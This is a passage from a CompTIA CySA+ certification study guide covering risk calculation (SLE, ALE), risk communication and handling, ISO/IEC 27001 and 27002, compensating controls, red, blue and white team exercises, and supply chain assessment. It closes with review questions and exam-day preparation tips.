assessment should include the uncertainty level.
Quantitative Risk Analysis
A quantitative risk analysis assigns monetary and
numeric values to all facets of the risk analysis process,
including asset value, threat frequency, vulnerability
severity, impact, and safeguard costs. Equations are used
to determine total and residual risks. An advantage of
quantitative over qualitative risk analysis is that
quantitative uses less guesswork than qualitative.
Disadvantages of quantitative risk analysis include the
difficulty of the equations, the time and effort needed to
complete the analysis, and the level of data that must be
gathered for the analysis.
Most risk analysis includes some hybrid of both
quantitative and qualitative risk analyses. Most
organizations favor using quantitative risk analysis for
tangible assets and qualitative risk analysis for intangible
assets. Keep in mind that even though quantitative risk
analysis uses numeric values, a purely quantitative
analysis cannot be achieved because some level of
subjectivity is always part of the data. This type of
estimate should be based on historical data, industry
experience, and expert opinion.
RISK CALCULATION
A quantitative risk analysis assigns monetary and
numeric values to all facets of the risk analysis process,
including asset value, threat frequency, vulnerability
severity, impact, safeguard costs, and so on. Equations
are used to determine total and residual risks. The most
common equations are for single loss expectancy and
annual loss expectancy.
The single loss expectancy (SLE) is the monetary
impact of each threat occurrence. To determine the SLE,
you must know the asset value (AV) and the
exposure factor (EF), which is the percentage value
or functionality of an asset that will be lost when a threat
event occurs. The calculation for obtaining the SLE is as
follows:
SLE = AV × EF
For example, an organization has a web server farm with
an AV of $20,000. If the risk assessment has determined
that a power failure is a threat agent for the web server
farm and the EF for a power failure is 25%, the SLE for
this event equals $5000.
The annual loss expectancy (ALE) is the expected
risk factor of an annual threat event. To determine the
ALE, you must know the SLE and the annualized rate
of occurrence (ARO), which is the estimate of how
often a given threat might occur annually. The
calculation for obtaining the ALE is as follows:
ALE = SLE × ARO
Using the previously mentioned example, if the risk
assessment has determined that the ARO for the power
failure of the web server farm is 50%, the ALE for this
event equals $2500. Security professionals should keep
in mind that this calculation can be adjusted for
geographic distances.
Using the ALE, the organization can decide whether to
implement controls or not. If the annual cost of the
control to protect the web server farm is more than the
ALE, the organization could easily choose to accept the
risk by not implementing the control. If the annual cost
of the control to protect the web server farm is less than
the ALE, the organization should consider implementing
the control.
As previously mentioned, even though quantitative risk
analysis uses numeric value, a purely quantitative
analysis cannot be achieved because some level of
subjectivity is always part of the data. In the previous
example, how does the organization know that damage
from the power failure will be 25% of the asset? This type
of estimate should be based on historical data, industry
experience, and expert opinion.
Probability
Both qualitative and quantitative risk analysis processes
take into consideration the probability that an event will
occur. In quantitative risk analysis, this consideration is
made using the ARO value for each event. In qualitative
risk assessment, each possible event is assigned a
probability value by subject matter experts.
Magnitude
Both qualitative and quantitative risk analysis processes
take into consideration the magnitude of an event that
might occur. In quantitative risk analysis, this
consideration is made using the SLE and ALE values for
each event. In qualitative risk assessment, each possible
event is assigned an impact (magnitude) value by subject
matter experts.
COMMUNICATION OF RISK
FACTORS
Technical cybersecurity risks represent a threat that is
largely misunderstood by non-technical personnel.
Security professionals must bridge the knowledge gap in
a manner that the stakeholders understand. To properly
communicate technical risks, security professionals must
first understand their audience and then be able to
translate those risks into business terms that the
audience understands.
The audience that needs to understand the technical
risks includes semi-technical audiences, non-technical
leadership, the board of directors and executives, and
regulators. The semi-technical audience understands the
security operations difficulties and often consists of
powerful allies. Typically, this audience needs a datadriven, high-level message based on verifiable facts and
trends. The non-technical leadership audience needs the
message to be put in context with their responsibilities.
This audience needs the cost of cybersecurity
expenditures to be tied to business performance.
Security professionals should present metrics that show
how cyber risk is trending, without using popular jargon.
The board of directors and executives are primarily
concerned with business risk management and
managing return on assets. The message to this group
should translate technical risk into common business
terms and present metrics about cybersecurity risk and
performance.
Finally, when communicating with regulators, it is
important to be thorough and transparent. In addition,
organizations may want to engage a third party to do a
gap assessment before an audit. This helps security
professionals find and remediate weaknesses prior to the
audit and enables the third party to speak on behalf of
the security program.
To frame the technical risks into business terms for these
audiences, security professionals should focus on
business disruption, regulatory issues, and bad press. If a
company’s database is attacked and, as a result, the
website cannot sell products to customers, this is a
significant disruption of business operations. If an
incident occurs that results in a regulatory investigation
and fines, a regulatory issue has arisen. Bad press can
result in lost sales and costs to repair the organization’s
image.
Security professionals must understand the risk metrics
and what each metric costs the organization. Although
security professionals may not definitively know the
return on investment (ROI), they should take the
security incident frequency at the organization and
assign costs in terms of risk exposure for every risk. It is
also helpful to match the risks with the assets protected
to make sure the organization’s investment is protecting
the most valuable assets.
Moreover, security professionals alone cannot best
determine the confidentiality, integrity, and availability
(CIA) levels for enterprise information assets. Security
professionals should consult with the asset stakeholders
to gain their input on which level should be assigned to
each tenet for an information asset. Keep in mind,
however, that all stakeholders should be consulted. For
example, while department heads should be consulted
and have the biggest influence on the CIA decisions
about departmental assets, other stakeholders within the
department and organization should be consulted as
well.
This rule holds for any security project that an enterprise
undertakes. Stakeholder input should be critical at the
start of the project to ensure that stakeholder needs are
documented and to gain stakeholder project buy-in.
Later, if problems arise with the security project and
changes must be made, the project team should discuss
the potential changes with the project stakeholders
before any project changes are approved or
implemented.
RISK PRIORITIZATION
As previously discussed, by using either quantitative or
qualitative analysis, you can arrive at a priority list that
indicates which issues need to be treated sooner rather
than later and which can wait. In qualitative analysis,
one method used is called a risk assessment matrix.
When a qualitative assessment is conducted, the risks are
placed into the following categories:
• High
• Medium
• Low
Then, a risk assessment matrix, such as the one in Figure
20-1, is created. Subject experts grade all risks based on
their likelihood and impact. This helps prioritize the
application of resources to the most critical
vulnerabilities.
Figure 20-1 Risk Assessment Matrix
Security Controls
Chapter 21, “The Importance of Frameworks, Policies,
Procedures, and Controls,” delves deeply into the types
of controls that can be implemented to address security
issues. The selection of controls that are both cost
effective and capable of addressing the issue depends in
large part of how an organizations chooses to address or
handle risk. The following four basic methods are used to
handle risk:
• Risk avoidance: Terminating the activity that
causes a risk or choosing an alternative that is not
as risky
• Risk transfer: Passing on the risk to a third
party, such as an insurance company
• Risk mitigation: Defining the acceptable risk
level the organization can tolerate and reducing
the risk to that level
• Risk acceptance: Understanding and accepting
the level of risk as well as the cost of damages that
can occur
Engineering Tradeoffs
In some cases, there may be issues that make
implementing a particular solution inadvisable or
impossible. Engineering tradeoffs are inhibitors to
remediation and are covered in the following sections.
MOUs
A memorandum of understanding (MOU) is a
document that, while not legally binding, indicates a
general agreement between the principals to do
something together. An organization may have MOUs
with multiple organizations, and MOUs may in some
instances contain security requirements that inhibit or
prevent the deployment of certain measures.
SLAs
A service-level agreement (SLA) is a document that
specifies a service to be provided by a party, the costs of
the service, and the expectations of performance. These
contracts may exist with third parties from outside the
organization and between departments within an
organization. Sometimes these SLAs may include
specifications that inhibit or prevent the deployment of
certain measures.
Organizational Governance
Organizational governance refers to the process of
controlling an organization’s activities, processes, and
operations. When the process is unwieldy, as it is in
some very large organizations, the application of
countermeasures may be frustratingly slow. One of the
reasons for including upper management in the entire
process is to use the weight of authority to cut through
the red tape.
Business Process Interruption
The deployment of mitigations cannot be done in such a
way that business operations and processes are
interrupted. Therefore, the need to conduct these
activities during off hours can also be a factor that
impedes the remediation of vulnerabilities.
Degrading Functionality
Finally, some solutions create more issues than they
resolve. In some cases, it may be impossible to
implement mitigation due to the fact that it breaks
mission-critical applications or processes. The
organization may need to research an alternative
solution.
SYSTEMS ASSESSMENT
Systems assessment comprises a process whereby
systems are fully vetted for potential issues from both a
functionality standpoint and a security standpoint. These
assessments (discussed more fully in Chapter 21) can
lead to two types of organizational approvals:
accreditation and certification. Although the terms are
used as synonyms in casual conversation, accreditation
and certification are two different concepts in the context
of assurance levels and ratings. However, they are closely
related. Certification evaluates the technical system
components, whereas accreditation occurs when the
adequacy of a system’s overall security is accepted by
management.
ISO/IEC 27001
ISO/IEC 27001:2013 is the current version of the
27001 standard, and it is one of the most popular
standards by which organizations obtain certification for
information security. It provides guidance on ensuring
that an organization’s information security management
system (ISMS) is properly established, implemented,
maintained, and continually improved. It includes the
following components:
• ISMS scope
• Information security policy
• Risk assessment process and its results
• Risk treatment process and its decisions
• Information security objectives
• Information security personnel competence
• Necessary ISMS-related documents
• Operational planning and control document
• Information security monitoring and
measurement evidence
• ISMS internal audit program and its results
• Top management ISMS review evidence
• Evidence of identified nonconformities and
corrective actions
When an organization decides to obtain ISO/IEC 27001
certification, a project manager should be selected to
ensure that all the components are properly completed.
To implement ISO/IEC 27001:2013, the project manager
should complete the following steps:
Step 1. Obtain management support.
Step 2. Determine whether to use consultants or to
complete the work in-house, purchase the
27001 standard, write the project plan, define
the stakeholders, and organize the project
kickoff.
Step 3. Identify the requirements.
Step 4. Define the ISMS scope, information security
policy, and information security objectives.
Step 5. Develop document control, internal audit,
and corrective action procedures.
Step 6. Perform risk assessment and risk treatment.
Step 7. Develop a statement of applicability and a
risk treatment plan and accept all residual
risks.
Step 8. Implement the controls defined in the risk
treatment plan and maintain the
implementation records.
Step 9. Develop and implement security training
and awareness programs.
Step 10. Implement the ISMS, maintain policies and
procedures, and perform corrective actions.
Step 11. Maintain and monitor the ISMS.
Step 12. Perform an internal audit and write an
audit report.
Step 13. Perform management review and maintain
management review records.
Step 14. Select a certification body and complete
certification.
Step 15. Maintain records for surveillance visits.
For more information, visit
https://www.iso.org/standard/54534.html.
ISO/IEC 27002
ISO/IEC 27002:2013 is the current version of the
27002 standard, and it provides a code of practice for
information security management. It includes the
following 14 content areas:
• Information security policy
• Organization of information security
• Human resources security
• Asset management
• Access control
• Cryptography
• Physical and environmental security
• Operations security
• Communications security
• Information systems acquisition, development,
and maintenance
• Supplier relationships
• Information security incident management
• Information security aspects of business
continuity
• Compliance
For more information, visit
https://www.iso.org/standard/54533.html.
DOCUMENTED
COMPENSATING CONTROLS
As pointed out in the section “Engineering Tradeoffs”
earlier in this chapter, in some cases, there may be issues
that make implementing a particular solution
inadvisable or impossible. Not all weaknesses can be
eliminated. In some cases, they can only be mitigated.
This can be done by implementing controls that
compensate for a weakness that cannot be completely
eliminated. A compensating control reduces the
potential risk. Compensating controls are also referred to
as countermeasures and safeguards. Three things must
be considered when implementing a compensating
control: vulnerability, threat, and risk. For example, a
good countermeasure might be to implement the
appropriate ACL and encrypt the data. The ACL protects
the integrity of the data, and the encryption protects the
confidentiality of the data.
Compensating controls are put in place to substitute for
a primary access control and mainly act to mitigate risks.
By using compensating controls, you can reduce risk to a
more manageable level. Examples of compensating
controls include requiring two authorized signatures to
release sensitive or confidential information and
requiring two keys owned by different personnel to open
a safety deposit box. These compensating controls must
be recorded along with the reason the primary control
was not implemented. Compensating controls are
covered further in Chapter 21.
TRAINING AND EXERCISES
Security analysts must practice responding to security
events in order to react to them in the most organized
and efficient manner. There are some well-established
ways to approach this. This section looks at how teams of
analysts, both employees and third-party contractors,
can be organized and some well-established names for
these teams. Security posture is typically assessed by war
game exercises in which one group attacks the network
while another attempts to defend the network. These
games typically have some implementation of the
following teams.
Red Team
The red team acts as the attacking force. It typically
carries out penetration tests by following a wellestablished process of gathering information about the
network, scanning the network for vulnerabilities, and
then attempting to take advantage of the vulnerabilities.
The actions they can take are established ahead of time
in the rules of engagement. Often these individuals are
third-party contractors with no prior knowledge of the
network. This helps them simulate attacks that are not
inside jobs.
Blue Team
The blue team acts as the network defense team, and
the attempted attack by the red team tests the blue
team’s ability to respond to the attack. It also serves as
practice for a real attack. This includes accessing log
data, using a SIEM, garnering intelligence information,
and performing traffic and data flow analysis.
White Team
The white team is a group of technicians who referee
the encounter between the red team and the blue team.
Enforcing the rules of engagement might be one of the
white team’s roles, along with monitoring the responses
to the attack by the blue team and making note of
specific approaches employed by the red team.
Tabletop Exercise
Conducting a tabletop exercise is the most cost-effective
and efficient way to identify areas of vulnerability before
moving on to higher-level testing. A tabletop exercise
is an informal brainstorming session that encourages
participation from business leaders and other key
employees. In a tabletop exercise, the participants agree
to determine a particular attack scenario upon which
they then focus.
SUPPLY CHAIN
ASSESSMENT
Organizational risk mitigation requires assessing the
safety and the integrity of the hardware and software
before the organization purchases it. The following are
some of the methods used to assess the supply chain
through which a hardware or software product flows to
ensure that the product does not pose a security risk to
the organization.
Vendor Due Diligence
When performing due diligence with regard to a vendor,
it means that we are assessing the vendor with regard to
the vendor’s products and services. While surely we are
concerned with the functionality and value of the
products, we are even more concerned about the innate
security of such products. Stories about counterfeit gear
that contains backdoors have circulated for years and are
not unfounded. Online resources for conducting due
diligence about vendors include
https://complyadvantage.com/knowledgebase/vendorduediligence/#:~:text=The%20vendor%20%28target%20co
mpany%29%20engages%20a%20third%20party,the%20
commencement%20of%20the%20sale%20or%20partner
ship%20arrangement.
OEM Documentation
One of the ways you can reduce the likelihood of
purchasing counterfeit equipment is to insist on the
inclusion of verifiable original equipment manufacturer
(OEM) documentation. In many cases, this paperwork
includes anti-counterfeiting features. Make sure to use
the vendor website to verify all the various identifying
numbers in the documentation.
Hardware Source Authenticity
When purchasing hardware to support any network or
security solution, a security professional must ensure
that the hardware’s authenticity can be verified. Just as
expensive consumer items such as purses and watches
can be counterfeited, so can network equipment.
Whereas the dangers with counterfeit consumer items
are typically confined to a lack of authenticity and
potentially lower quality, the dangers presented by
counterfeit network gear can extend to the presence of
backdoors in the software or firmware. Always purchase
equipment directly from the manufacturer when
possible, and when purchasing from resellers, use
caution and insist on a certificate of authenticity. In any
case where the price seems too good to be true, keep in
mind that it may be an indication the gear is not
authentic.
Trusted Foundry
The Trusted Foundry program can help you
exercise care in ensuring the authenticity and integrity of
the components of hardware purchased from a vendor.
This DoD program identifies “trusted vendors” and
ensures a “trusted supply chain.” A trusted supply chain
begins with trusted design and continues with trusted
mask, foundry, packaging/assembly, and test services. It
ensures that systems have access to leading-edge
integrated circuits from secure, domestic sources. At the
time of this writing, 77 vendors have been certified as
trusted.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 20-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 20-2 Key Topics in Chapter 20
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
business impact analysis (BIA)
Business Continuity Planning (BCP) committee
recoverability
fault tolerance
risk assessment
qualitative risk analysis
quantitative risk analysis
single loss expectancy (SLE)
annual loss expectancy (ALE)
asset value (AV)
exposure factor (EF)
annualized rate of occurrence (ARO)
risk assessment matrix
risk avoidance
risk transfer
risk mitigation
risk acceptance
memorandum of understanding (MOU)
service-level agreement (SLA)
organizational governance
systems assessment
ISO/IEC 27001:2013
ISO/IEC 27002:2013
red team
blue team
white team
tabletop exercise
Trusted Foundry program
REVIEW QUESTIONS
1. The vulnerability analysis and risk assessment may
be performed by the __________________ or
by a separately appointed risk assessment team.
2. List the four main steps of the BIA in order.
3. Match the following terms with their definitions.
4. ____________________ assigns monetary and
numeric values to all facets of the risk analysis
process, including asset value, threat frequency,
vulnerability severity, impact, and safeguard costs.
5. An organization has a web server farm with an AV
of $20,000. If the risk assessment has determined
that a power failure is a threat agent for the web
server farm and the EF for a power failure is 25%,
the SLE for this event equals $_____________.
6. Match the following terms with their definitions.
7. The _______________________ helps
prioritize the application of resources to the most
critical vulnerabilities during qualitative risk
assessment.
8. List and define at least two ways to handle risk.
9. Match the following terms with their definitions.
10. ALE = ________________
Chapter 21. The
Importance of
Frameworks, Policies,
Procedures, and Controls
[This content is currently
in development.]
This content is currently in development.
Chapter 22. Final
Preparation
The purpose of this chapter is to demystify the
certification preparation process for you. This includes
taking a more detailed look at the actual certification
exam itself. This chapter shares some helpful ideas on
ensuring that you are ready for the exam. Many people
become anxious about taking exams, so this chapter
gives you the tools to build confidence for exam day.
The first 21 chapters of this book cover the technologies,
protocols, design concepts, and considerations required
to be prepared to pass the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 exam. While these chapters
supply the detailed information, most people need more
preparation than just reading the first 21 chapters of this
book. This chapter details a set of tools and a study plan
to help you complete your preparation for the exams.
This short chapter has four main sections. The first
section lists the CompTIA CySA+ CS0-002 exam
information and breakdown. The second section shares
some important tips to keep in mind to ensure you are
ready for this exam. The third section discusses exam
preparation tools useful at this point in the study
process. The final section of this chapter lists a suggested
study plan now that you have completed all the earlier
chapters in this book.
Note
Appendix C, “Memory Tables,” and Appendix D, “Memory Tables Answer Key,”
exist as soft-copy appendixes on the website for this book, which you can
access by going to https://www.pearsonITcertification.com/register, registering
your book, and entering this book’s ISBN: 9780136747161.
EXAM INFORMATION
Here are details you should be aware of regarding the
exam that maps to this text.
Exam code: CS0-002
Question types: Multiple-choice and performancebased questions
Number of questions: Maximum of 85
Time limit: 165 minutes
Required passing score: 750 (on a scale of 100 to
900)
Exam fee (subject to change): $359.00 USD
Note
The following information is copied from the CompTIA CySA+ web page.
As attackers have learned to evade traditional signaturebased solutions, such as firewalls and anti-virus
software, an analytics-based approach within the IT
security industry is increasingly important for
organizations. CompTIA CySA+ applies behavioral
analytics to networks to improve the overall state of
security through identifying and combating malware and
advanced persistent threats (APTs), resulting in an
enhanced threat visibility across a broad attack surface.
It will validate an IT professional’s ability to proactively
defend and continuously improve the security of an
organization. CySA+ will verify the successful candidate
has the knowledge and skills required to
• Leverage intelligence and threat detection
techniques
• Analyze and interpret data
• Identify and address vulnerabilities
• Suggest preventative measures
• Effectively respond to and recover from incidents
GETTING READY
Here are some important tips to keep in mind to ensure
that you are ready for this rewarding exam:
Note
Recently CompTIA has expanded its online testing offerings to include the
CySA+
exam.
For
information
on
this
option
see
https://www.comptia.org/testing/testing-options/take-online-exam.
• Build and use a study tracker: Consider
taking the exam objectives and building a study
tracker. This can be a notebook outlining the
objectives, with your notes written out. Using
pencil and paper can help concentration by
making you take the time to think about potential
answers to questions that might be asked on the
exam for each objective. A study tracker will help
ensure that you have not missed anything and
that you are confident for your exam. There are
other ways, including a sample Study Planner as a
website supplement to this book (Appendix E).
Whatever works best for you is the right option to
use.
• Think about your time budget for questions
in the exam: When you do the math, you realize
that you have a bit less than 2 minutes per exam
question. While this does not sound like enough
time, keep in mind that many of the questions will
be very straightforward, and you will take 15 to 30
seconds on those. This builds time for other
questions as you take your exam.
• Watch the clock: Periodically check the time
remaining as you are taking the exam. You might
even find that you can slow down pretty
dramatically if you have built up a nice block of
extra time.
• Consider ear plugs: Some people are sensitive
to noise when concentrating. If you are one of
them, ear plugs may help. There might be other
test takers in the center with you and you do not
want to be distracted by them.
• Plan your travel time: Give yourself extra time
to find the center and get checked in. Be sure to
arrive early. As you test more at that center, you
can certainly start cutting it closer time-wise.
• Get rest: Most students report success with
getting plenty of rest the night before the exam.
All-night cram sessions are not typically
successful.
• Bring in valuables but get ready to lock
them up: The testing center will take your
phone, your smart watch, your wallet, and other
such items and will provide a secure place for
them.
• Use the restroom before going in: If you
think you will need a break during the test, clarify
the rules with the test proctor.
• Take your time getting settled: Once you are
seated, take a breath and organize your thoughts.
Remind yourself that you have worked hard for
this opportunity and expect to do well. The 165minute timer doesn’t start until you tell it to after
a brief tutorial. The timer starts when you agree to
see the first question.
• Take notes: You will be given note-taking
materials, so take advantage of them. Sketch out
lists and mnemonics that you memorized. The
note paper can be used for any calculations you
need, but it is okay to write notes to yourself
before beginning.
• Practice exam questions are great—so use
them: This text provides many practice exam
questions. Be sure to go through them thoroughly.
Remember, you shouldn’t blindly memorize
answers; instead, let the questions really
demonstrate where you are weak in your
knowledge and then study up on those areas.
TOOLS FOR FINAL
PREPARATION
This section lists some information about the available
tools and how to access the tools.
Pearson Test Prep Practice Test
Software and Questions on the
Website
Register this book to get access to the Pearson Test Prep
practice test software (software that displays and grades
a set of exam-realistic, multiple-choice questions). Using
the Pearson Test Prep practice test software, you can
either study by going through the questions in Study
mode or take a simulated (timed) CySA+ exam.
The Pearson Test Prep practice test software comes with
two full practice exams. These practice tests are available
to you either online or as an offline Windows application.
To access the practice exams that were developed with
this book, please see the instructions in the card inserted
in the sleeve in the back of the book. This card includes a
unique access code that enables you to activate your
exams in the Pearson Test Prep software. You will find
detailed instructions for accessing the Pearson Test Prep
software in the Introduction to this book.
Memory Tables
Like most exam Cert Guides, this book purposely
organizes information into tables and lists for easier
study and review. Rereading these tables and lists can be
very useful before the exam. However, it is easy to skim
over the tables without paying attention to every detail,
especially when you remember having seen the table’s
contents when reading the chapter.
Instead of just reading the tables in the various chapters,
this book’s Appendixes C and D give you another review
tool. Appendix C lists partially completed versions of
many of the tables from the book. You can open
Appendix C (a PDF available on the book website after
registering) and print the appendix. For review, you can
attempt to complete the tables. This exercise can help
you focus on the review. It also exercises the memory
connectors in your brain, and it prompts you to think
about the information from context clues, which forces a
little more contemplation about the facts.
Appendix D, also a PDF located on the book website, lists
the completed tables to check yourself. You can also just
refer to the tables as printed in the book.
Chapter-Ending Review Tools
Chapters 1 through 21 each have several features in the
“Exam Preparation Tasks” section at the end of the
chapter. You might have already worked through these in
each chapter. It can also be helpful to use these tools
again as you make your final preparations for the exam.
SUGGESTED PLAN FOR
FINAL REVIEW/STUDY
This section lists a suggested study plan that should
guide you, until you take the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 exam. Certainly, you can
ignore this plan, use it as is, or just take suggestions from
it.
The plan uses four steps:
Step 1. Review the key topics and the “Do I
Know This Already?” questions: You can
use the table that lists the key topics in each
chapter, or just flip the pages looking for key
topics. Also, reviewing the DIKTA quiz
questions from the beginning of the chapter
can be helpful for review.
Step 2. Complete memory tables: Open
Appendix C from the book website and print
the entire thing, or print the tables by major
part. Then complete the tables.
Step 3. Review the “Review Questions”
sections: Go through the review questions at
the end of each chapter to identify areas
where you need more study.
Step 4. Use the Pearson Test Prep practice
test software to practice: You can use the
Pearson Test Prep practice test software to
study by using a bank of unique examrealistic questions available only with this
book.
SUMMARY
The tools and suggestions listed in this chapter have
been designed with one goal in mind: to help you develop
the skills required to pass the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 exam. This book has been
developed from the beginning to not just tell you the
facts but also help you learn how to apply them. No
matter what your experience level leading up to when
you take the exam, it is my hope that the broad range of
preparation tools and the structure of the book help you
pass the exam with ease. I hope you do well on the exam.
Appendix A. Answers to
the "Do I Know This
Already?" Quizzes and
Review Questions [This
content is currently in
development.]
This content is currently in development.
Appendix B. CompTIA
Cybersecurity Analyst
(CySA+) CS0-002 Cert
Guide Exam Updates
[This content is currently
in development.]
This content is currently in development.
Glossary of Key Terms
[This content is currently
in development.]
This content is currently in development.
Appendix C. Memory
Tables [This content is
currently in development.]
This content is currently in development.
Appendix D. Memory
Tables Answer Key [This
content is currently in
development.]
This content is currently in development.
Appendix E. Study
Planner [This content is
currently in development.]
This content is currently in development.
Download
Study collections